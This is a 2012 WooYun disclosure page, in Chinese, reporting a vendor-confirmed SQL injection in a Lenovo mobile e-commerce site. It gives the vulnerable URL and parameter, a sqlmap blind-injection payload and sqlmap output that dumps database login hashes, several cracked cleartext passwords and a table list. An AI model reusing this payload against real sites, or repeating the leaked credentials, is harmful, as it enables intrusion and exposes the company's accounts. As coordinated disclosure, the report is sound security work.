当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010832

漏洞标题:联想某站点SA注射漏洞

相关厂商:联想

漏洞作者: 风萧萧

提交时间:2012-08-12 18:16

修复时间:2012-09-26 18:17

公开时间:2012-09-26 18:17

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-12: 细节已通知厂商并且等待厂商处理中
2012-08-13: 厂商已经确认,细节仅向厂商公开
2012-08-23: 细节向核心白帽子及相关领域专家公开
2012-09-02: 细节向普通白帽子公开
2012-09-12: 细节向实习白帽子公开
2012-09-26: 细节向公众公开

简要描述:

射了一个星期了,精疲力尽,实在不能进一步发展鸟

详细说明:

1.这个站点啦,联想移动电子商务系统哦,貌似和牛B的样子:

http://ec.lenovomobile.com/


2.这里可以注射:

http://ec.lenovomobile.com/WebForm/Other/Other_download/Other_DownLoad_ListInfo.aspx?List_Name=联想移动合作银行


3.SA跑的呢:

漏洞证明:

4.可以跨多个库哦:


5.多个数据库账户的弱口令:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: List_Name
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: List_Name=联想移动合作银行' AND 6011=6011 AND 'HHoo'='HHoo
---
database management system users password hashes:
[*] sa [1]:
password hash: 0x0100b067524976ec63baa2ca005f95c57ee92c62e5dc0d2a27072c2812de9a617e1108f39c388b5252c274bebe9e
header: 0x0100
salt: b0675249
mixedcase: 76ec63baa2ca005f95c57ee92c62e5dc0d2a2707
uppercase: 2c2812de9a617e1108f39c388b5252c274bebe9e
[*] shenjx [1]:
password hash: 0x01003e74822ba8b269e35e354d5c51ae092ac3fa75a7b1dba093a8b269e35e354d5c51ae092ac3fa75a7b1dba093
header: 0x0100
salt: 3e74822b
mixedcase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093
uppercase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093
clear-text password: 654321
[*] swwl [1]:
password hash: 0x0100b575e507b98bcb343331377b5ba7a26a09e83a51821c2f96fa0950ee393ffbb1980d997bce436645398f0219
header: 0x0100
salt: b575e507
mixedcase: b98bcb343331377b5ba7a26a09e83a51821c2f96
uppercase: fa0950ee393ffbb1980d997bce436645398f0219
clear-text password: swwl
[*] wends [1]:
password hash: 0x01001a76751df147fd28495401d6f84e98be0ba48bb05226b4e1e046486691b981689f41de885727f169f0850578
header: 0x0100
salt: 1a76751d
mixedcase: f147fd28495401d6f84e98be0ba48bb05226b4e1
uppercase: e046486691b981689f41de885727f169f0850578
clear-text password: wends


6.看下当前库【LMECOTHER】的表信息,在此之前已经有人来过了,留下了D99和pangolin的临时表哎:

Database: LMECOTHER
[38 tables]
+--------------------------------------------------+
| dbo.D99_CMD |
| dbo.D99_Tmp |
| dbo.Other_Address_List |
| dbo.Other_Address_Org |
| dbo.Other_BBS_Forum |
| dbo.Other_BBS_ForumGroups |
| dbo.Other_BBS_Posts |
| dbo.Other_BBS_RePosts |
| dbo.Other_BBS_Users |
| dbo.Other_ClickStat |
| dbo.Other_CusLine |
| dbo.Other_CusLine_Type |
| dbo.Other_DownLoad_KnowLedge_Type |
| dbo.Other_DownLoad_List |
| dbo.Other_DownLoad_List_Type |
| dbo.Other_DownLoad_Pic |
| dbo.Other_DownLoad_Tools |
| dbo.Other_DownLoad_knowledge |
| dbo.Other_Link |
| dbo.Other_Rule |
| dbo.Other_Survey |
| dbo.Other_Survey_Item |
| dbo.Other_Survey_Result |
| dbo.View_Forum |
| dbo.View_PostList |
| dbo.dtproperties |
| dbo.kill_kk |
| dbo.other_CustMailInfo |
| dbo.other_CustMailView |
| dbo.other_Notice |
| dbo.other_Notice_New |
| dbo.other_Notification |
| dbo.other_NotificationObj |
| dbo.other_NotificationObj_New |
| dbo.other_Notification_New |
| dbo.pangolin_test_table |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+

修复方案:

发礼物吧,还能怎么办!

版权声明:转载请注明来源 风萧萧@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-08-13 01:07

厂商回复:

thank you very much!

最新状态:

暂无


漏洞评价:

评论

  1. 2012-08-12 18:35 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )

    @风萧萧 基友 我来观望你的

  2. 2012-08-13 08:12 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @neal 哈哈,果然是好基友!

  3. 2012-08-13 08:13 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @联想 乐phone拿来,我会更给力的!

  4. 2012-08-13 09:30 | koohik ( 普通白帽子 | Rank:542 漏洞数:63 | 没什么介绍的http://www.koohik.com/)

    @风萧萧 哈哈哈,各种给力